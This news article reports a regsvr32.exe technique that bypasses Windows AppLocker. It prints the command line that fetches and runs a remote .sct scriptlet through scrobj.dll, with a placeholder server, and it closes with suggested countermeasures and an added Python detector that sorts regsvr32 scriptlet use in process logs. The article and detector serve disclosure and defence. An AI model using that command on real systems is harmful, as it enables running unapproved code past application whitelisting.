Windows 7 gave IT managers a new tool to control which software Windows business users may run on their PCs. AppLocker allows you to restrict execution of software on the system by whitelisting it for certain user groups, such as administrators. In addition to preventing employees from playing games during work hours, this can also prevent the execution of malware.
But last week it became clear that AppLocker can be bypassed simply by using a little-known feature of the regsvr32.exe tool that is built into Windows.
It was security researcher Casey Smith who discovered this, as described by The Register.
Loads via the internet
The little-known feature is that regsvr32 can load and run scripts from the internet when it is invoked with parameters like these:
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
The URL in the command is replaced with a script such as this proof of concept that Smith has authored. The proof of concept starts the command line (cmd.exe), but in theory this could be replaced by any program that exists on the PC, including programs that are not whitelisted by AppLocker.
A collection of potentially more harmful examples can be found here. The video below demonstrates the simple proof of concept.
Possible countermeasures
Regsvr32, according to Casey, has very good support for loading URLs, including support for redirection and HTTPS. In addition, it does not require administrator privileges, and the command makes no changes to the Windows registry.
It is very likely that this can be exploited by malicious actors to gain greater control over the system.
One possible measure, until any security fixes are available, is according to CSO Online to block regsvr32.exe and possibly regsvr64.exe in the Windows firewall, so that the tool does not get network access. But it should also be possible for users to point the tool at a script stored in a local file instead.
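Because a firewall rule only covers the remote case, a defender would want to spot both variants in process-creation logs. The following is an added example, not code from the article or from Casey Smith: it classifies constructed process-creation events (image path plus command line, a shape assumed here) by whether regsvr32 is asked to run a scriptlet from a URL, from a local file, or is doing ordinary DLL registration.

```python
import re

# Constructed sample process-creation events; not taken from the article.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"},
    {"image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:C:\Users\Public\file.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\component.dll"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# /i:<string> is passed to DllInstall; the string may be quoted and may use - or /.
INSTALL_ARG_RE = re.compile(r'[/-]i:"?([^\s"]+)', re.IGNORECASE)
# Anything fetched over the network rather than read from disk.
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def classify_regsvr32(image: str, cmdline: str) -> str:
    """Return 'remote', 'local' or 'benign' for one process-creation event.

    'remote': regsvr32 given a URL via /i: (scriptlet fetched over the network).
    'local':  regsvr32 loading scrobj.dll with a non-URL /i: target (local .sct).
    'benign': any other process, or plain DLL registration without scrobj.dll.
    """
    if not image.lower().endswith("regsvr32.exe"):
        return "benign"
    uses_scrobj = "scrobj.dll" in cmdline.lower()
    match = INSTALL_ARG_RE.search(cmdline)
    target = match.group(1) if match else ""
    if URL_RE.match(target):
        return "remote"          # network fetch: the case a firewall rule would block
    if uses_scrobj:
        return "local"           # same technique, but the script is already on disk
    return "benign"              # ordinary COM registration, e.g. regsvr32 /s foo.dll


def triage(events: list) -> dict:
    """Count events per classification so a report can be built from a log batch."""
    counts = {"remote": 0, "local": 0, "benign": 0}
    for event in events:
        counts[classify_regsvr32(event["image"], event["cmdline"])] += 1
    return counts


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(classify_regsvr32(event["image"], event["cmdline"]), "|", event["cmdline"])
    print(triage(SAMPLE_EVENTS))
```

The "local" class is the reason a network block alone is not sufficient: the same scrobj.dll invocation is visible in the command line whether the .sct file came from a URL or from disk.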
The site Brown Hat Security describes the vulnerability as extremely serious, since it allows the execution of arbitrary code from a presumably trusted system tool.
Several websites have tried to get Microsoft to comment on the issue, but apparently the company has so far not responded to the requests.